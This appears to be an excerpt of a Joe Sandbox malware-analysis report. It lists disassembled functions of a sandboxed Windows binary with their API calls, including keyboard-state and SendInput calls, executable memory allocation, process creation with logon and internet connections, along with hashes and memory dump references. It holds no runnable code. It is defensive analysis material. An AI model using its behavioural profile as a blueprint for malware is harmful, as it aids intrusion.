                          • API String ID: 2574300362-1816364905
                          • Opcode ID: d93091739f2daa2b4ba925ee911e189bb9c1662773ebdd4088a2cf12bfa1ce6e
                          • Instruction ID: 525a8ccab78eb5767a8fb95aa4c068c08384d48b7f1ead8eeff142b6dca450a7
                          • Opcode Fuzzy Hash: d93091739f2daa2b4ba925ee911e189bb9c1662773ebdd4088a2cf12bfa1ce6e
                          • Instruction Fuzzy Hash: 9AD05E344043129BDB202F31A888B5137D4AF08706B50949AE866A22A0DFB0D880C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B03EC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00B03EBB,?,00B03E91,?), ref: 00B03ED3
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B03EE5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-1355242751
                          • Opcode ID: 345634a96832851fb9b2ea20efe879719878ed694c4b1e3ae80e79ce42d98858
                          • Instruction ID: d976231cbd47a8bb9db2affcc36532209c59a54826d10b5ce2d7025875406380
                          • Opcode Fuzzy Hash: 345634a96832851fb9b2ea20efe879719878ed694c4b1e3ae80e79ce42d98858
                          • Instruction Fuzzy Hash: 7CD0A7344003129FD720AF22E80C7627BD8EF04B04B00459AE486E25F0DBF0C480C720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00B56AA6), ref: 00B0AB2D
                          • _wcscmp.LIBCMT ref: 00B0AB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper_wcscmp
                          • String ID:
                          • API String ID: 820872866-0
                          • Opcode ID: ff420420f33d69989b9817ff00050121216af1f57d19818285a0f4a499e43964
                          • Instruction ID: a735a52524a0650f7314b9e8ac89d01a23b0087c2970b13e5af7fa88ba058a52
                          • Opcode Fuzzy Hash: ff420420f33d69989b9817ff00050121216af1f57d19818285a0f4a499e43964
                          • Instruction Fuzzy Hash: 43A1D27070020A9BDB15EF65E9816A9BFF1FF44300F6589EAE856972E0EB349C70C746
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B60D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 00B60D85
                          • CharLowerBuffW.USER32(?,?), ref: 00B60DC8
                            • Part of subcall function 00B60458: CharLowerBuffW.USER32(?,?,?,?), ref: 00B60478
                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B60FB2
                          • _memmove.LIBCMT ref: 00B60FC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharLower$AllocVirtual_memmove
                          • String ID:
                          • API String ID: 3659485706-0
                          • Opcode ID: fdd985afd0a151a84b49e64bd21fdf66d52047e41754047bec5b219b24e013a6
                          • Instruction ID: 36a1ae721f5c79c7d4657d5693d4fcd6c47dbc81815314eb0989f7b90c6a2c46
                          • Opcode Fuzzy Hash: fdd985afd0a151a84b49e64bd21fdf66d52047e41754047bec5b219b24e013a6
                          • Instruction Fuzzy Hash: 7AB19D716143018FC714DF28C48096ABBF4EF89714F1489AEF8899B352DB35ED45CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                          Download Yara Rule
                          APIs
                          • _memmove.LIBCMT ref: 00B0C419
                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00B46653,?,?,00000000), ref: 00B0C495
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FileRead_memmove
                          • String ID:
                          • API String ID: 1325644223-0
                          • Opcode ID: c84ebe5198f0ed5c5a0f6c1860a584b43e6cc604295b18836a3c674a01d9eae8
                          • Instruction ID: 6773aa18e4542e3078e0eea61334381ee220a2cd56f40cbaf438e6dfc1b50489
                          • Opcode Fuzzy Hash: c84ebe5198f0ed5c5a0f6c1860a584b43e6cc604295b18836a3c674a01d9eae8
                          • Instruction Fuzzy Hash: 14A18870A04619EBDB00CF69C894BADBFF0FF05300F14C6D5E869AA291D735E960DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B242EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                          • String ID:
                          • API String ID: 3877424927-0
                          • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                          • Instruction ID: 0893eafd9a4c88049048d4febe37fc9bdef8d9fbf9a71ff8332da59ea330f186
                          • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                          • Instruction Fuzzy Hash: C251D330A003259BDB24DFA9E8806AE77F1EF41320F2487B9F83D96AD0DB749D519B44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00B6C354
                          • ScreenToClient.USER32(?,00000002), ref: 00B6C384
                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00B6C3EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: b47f700b9c2a0ed024f781314bf34570965aed4031f0a29c8f14b7f8fc23c0dd
                          • Instruction ID: f8217c278e31ffa91cb1f11edad15edacdea9c15e6794150ce0e168eb1e16c3d
                          • Opcode Fuzzy Hash: b47f700b9c2a0ed024f781314bf34570965aed4031f0a29c8f14b7f8fc23c0dd
                          • Instruction Fuzzy Hash: 0C510C71A00209EFDF10DF68C880ABE7BF6FB45360F248599E9659B291DB74ED41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B3D258
                          • __itow.LIBCMT ref: 00B3D292
                            • Part of subcall function 00B3D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B3D549
                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B3D2FB
                          • __itow.LIBCMT ref: 00B3D350
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$__itow
                          • String ID:
                          • API String ID: 3379773720-0
                          • Opcode ID: c9491222a373d559c363d240e5fcf79aa374a900f177c20b29782c899cd76131
                          • Instruction ID: ce4f4f756a3181ca5032aa51b85eacdd2fbf9b49ed01947e6a768e82a42dbe76
                          • Opcode Fuzzy Hash: c9491222a373d559c363d240e5fcf79aa374a900f177c20b29782c899cd76131
                          • Instruction Fuzzy Hash: DD416071A00209ABDF15EF54DC56BEE7BF9AF48700F1000A9FA06A3291DB749A45CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4EE87 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B4EF32
                          • GetLastError.KERNEL32(?,00000000), ref: 00B4EF58
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B4EF7D
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B4EFA9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: dda5a51ad5e7da51cf41e51cae1a2f05ce7c8abaa51a6adae133abc58e07c192
                          • Instruction ID: 7bf9c5865cd7f5cb4619c7eb62d6f84ba2ac5b78c013acd896e733c23985d9d1
                          • Opcode Fuzzy Hash: dda5a51ad5e7da51cf41e51cae1a2f05ce7c8abaa51a6adae133abc58e07c192
                          • Instruction Fuzzy Hash: 7B410439600611DFCB11EF15C584A5DBBE5EF99320B1980D9E856AF3A2CB30EE40DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                          Download Yara Rule
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B6B3E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: 185d8dff30ddd116f3509bdd6661fb70883cf2fb1b36ed56157e2890a8f2a8d6
                          • Instruction ID: b0bed331b4e5f67240d57c1323a40e0deb177033c7da4c75c484f63276172d4b
                          • Opcode Fuzzy Hash: 185d8dff30ddd116f3509bdd6661fb70883cf2fb1b36ed56157e2890a8f2a8d6
                          • Instruction Fuzzy Hash: 07319E34640208ABEF249F58DC85FA837F5EB06350F248596FA51D73E2DB38E9809B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00B6D617
                          • GetWindowRect.USER32(?,?), ref: 00B6D68D
                          • PtInRect.USER32(?,?,00B6EB2C), ref: 00B6D69D
                          • MessageBeep.USER32(00000000), ref: 00B6D70E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: 48452121dff5ee2646c22332047ec45d2fcd25ed7173e7812dbf47e3d7e02d19
                          • Instruction ID: 31e112cc80755e9b5e4838d26ec299d7ccd9c6822ebc456ff9c88951aa42c150
                          • Opcode Fuzzy Hash: 48452121dff5ee2646c22332047ec45d2fcd25ed7173e7812dbf47e3d7e02d19
                          • Instruction Fuzzy Hash: B2416930F04119DFCB11DF98D884FA97BF5FB49314F1885AAE4199B2A1DB34E841DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B44497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B444EE
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B4450A
                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00B4456A
                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B445C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: f5decf3ebe2a59be1fd12212a8bfc73916e550f14330ef737c3edbc99b5cdd8c
                          • Instruction ID: cf789b4a34501e3e36f692ba1423619b569dccd01881428b33585a0dee7a7624
                          • Opcode Fuzzy Hash: f5decf3ebe2a59be1fd12212a8bfc73916e550f14330ef737c3edbc99b5cdd8c
                          • Instruction Fuzzy Hash: 1C31E6719002585FEF209B649808BFEBBF5DB65314F08029AF4C1931D1CB749F64E761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B34DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B34DE8
                          • __isleadbyte_l.LIBCMT ref: 00B34E16
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B34E44
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B34E7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 1c34c95a165bb6091975e6accd3f07cac41a881be0a2900e2560fea2cc2f11db
                          • Instruction ID: 6ee7d49b9bb82b02bc8d8da59b7e7e699fbf510dd5ff7ae4849e29b033aa0153
                          • Opcode Fuzzy Hash: 1c34c95a165bb6091975e6accd3f07cac41a881be0a2900e2560fea2cc2f11db
                          • Instruction Fuzzy Hash: 5131BE31600226EFDF259F75C845BAA7BE6FF41310F2585A9E8258B1A0E730FC51DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B67AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 00B67AB6
                            • Part of subcall function 00B469C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B469E3
                            • Part of subcall function 00B469C9: GetCurrentThreadId.KERNEL32 ref: 00B469EA
                            • Part of subcall function 00B469C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B469F1
                          • GetCaretPos.USER32(?), ref: 00B67AC7
                          • ClientToScreen.USER32(00000000,?), ref: 00B67B00
                          • GetForegroundWindow.USER32 ref: 00B67B06
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: 0788becd65264d4fd2f067398c2b2dca41f0f5c01ef6bff8af4e87259c4d5e70
                          • Instruction ID: 28ec057ba54dd174bc5477734ae9459d5c37c64cb44298709e58fc5cbaf4a788
                          • Opcode Fuzzy Hash: 0788becd65264d4fd2f067398c2b2dca41f0f5c01ef6bff8af4e87259c4d5e70
                          • Instruction Fuzzy Hash: 85312F75D00108AFCB00EFB5DC859EFBBF9EF58314B5080AAE815E3211EA359E45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B549B7
                            • Part of subcall function 00B54A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B54A60
                            • Part of subcall function 00B54A41: InternetCloseHandle.WININET(00000000), ref: 00B54AFD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Internet$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 1463438336-0
                          • Opcode ID: bea2e70335456397553ad9170aab89e501df90915ff2c9107bf449c5f740894e
                          • Instruction ID: 327f4756c909e69038efa81f97b0f082a12e2f0c674d0c1bbbb5511f287e2d32
                          • Opcode Fuzzy Hash: bea2e70335456397553ad9170aab89e501df90915ff2c9107bf449c5f740894e
                          • Instruction Fuzzy Hash: 7621D435244605BFEB129F60CC01FBBB7E9FB48706F10409AFE0597650EB719858A794
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3BC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B3BCD9
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00B3BCE0
                          • CloseHandle.KERNEL32(00000004), ref: 00B3BCFA
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B3BD29
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
